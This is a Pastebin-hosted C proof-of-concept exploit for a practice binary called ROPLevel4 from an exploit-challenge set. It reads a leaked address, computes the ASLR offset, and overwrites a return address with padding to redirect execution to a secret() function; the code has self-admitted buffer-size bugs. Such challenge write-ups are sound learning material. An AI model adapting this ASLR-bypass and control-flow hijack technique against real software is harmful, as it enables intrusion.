exploit_for_roplevel4

a guest
Jun 1st, 2017
761
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.84 KB | None | 0 0
// Exploit for ROPLevel4
// PoC by Billy Ellis (@bellis1000)
// Full write-up available (soon?) on http://billyellis.net
// Download the ROPLevel4 binary from https://github.com/Billy-Ellis/Exploit-Challenges
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
  13. //probably should clear this up and split it in to separate functions but oh well ;-)
  14.  
  15. int main(){
  16.    
  17.     //fixed addresses can be found by statically analysing the binary
  18.  
  19.     int fixedAddr = 0xc03c;
  20.     int secretAddr = 0xbd28;
  21.    
  22.     //we'll use this eventually to store the final payload
  23.  
  24.     char exploit[128];
  25.    
  26.     //junk chars or "padding"
  27.    
  28.     char string[64] = {0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41};
  29.  
  30.     //this will be used to store the leaked address
  31.    
  32.     char readData[16];
  33.  
  34.     int fd[2];
  35.     pid_t pid1;
  36.     pipe(fd);
  37.    
  38.     pid1 = fork();
  39.    
  40.     //pipe stuff, thanks @liveoverflow for help with this :)
  41.  
  42.     if (pid1 == 0) {
  43.    
  44.         close(fd[1]);
  45.         dup2(fd[0],0);
  46.         //execute roplevel4
  47.         execv("./roplevel4", NULL);
  48.    
  49.     }
  50.  
  51.     printf("[*] Reading leaked address...\n");
  52.  
  53.     //wait 3 secs to ensure file containing info leak is created successfully
  54.    
  55.     sleep(3);
  56.    
  57.     //open and read contents of file into readData
  58.  
  59.     FILE *file = fopen("./leak.txt","r");
  60.     fgets(readData,32,file);
  61.     fclose(file);
  62.    
  63.     //then convert the string to an int so we can actually use it for calculations
  64.  
  65.     int addr;
  66.  
  67.     sscanf(readData,"%x",&addr);
  68.     printf("%x\n",addr);
  69.    
  70.     //calculate the ASLR "slide" or offset by working out the difference between the static addr & the real addr
  71.    
  72.     int offset = addr - fixedAddr;
  73.  
  74.     printf("[*] ASLR offset is: %x\n",offset);
  75.    
  76.     //calculate the real addr of the secret() function by adding the offset
  77.  
  78.     secretAddr = secretAddr + offset;
  79.  
  80.     printf("[*] Calculated address of secret() - %x\n",secretAddr);
  81.  
  82.     printf("[*] Crafting exploit payload...\n");
  83.    
  84.     //probably could have done this in a better way, but it works ;P
  85.     //basically adds the bytes of the calculated address to the junk chars and stores them in the exploit array
  86.  
  87.     unsigned int one = secretAddr & 0xff;
  88.     unsigned int two = (secretAddr>>8) & 0xff;
  89.     unsigned int three = (secretAddr>>16) & 0xff;
  90.     unsigned int four = (secretAddr>>24) & 0xff;
  91.  
  92.     sprintf(exploit,"%s%c%c%c",string,one,two,three);
  93.  
  94.     printf("[*] Payload crafted!\n[*] Executing...\n");
  95.  
  96.     close(fd[0]);
  97.    
  98.     //send the payload & hope for the best ;P
  99.    
  100.     //not 100% reliability, something to do with how I added the bytes to the string
  101.     //I'll probably improve as I learn more C
  102.    
  103.     write(fd[1],exploit,512);
  104.  
  105.     return 0;
  106.    
  107. }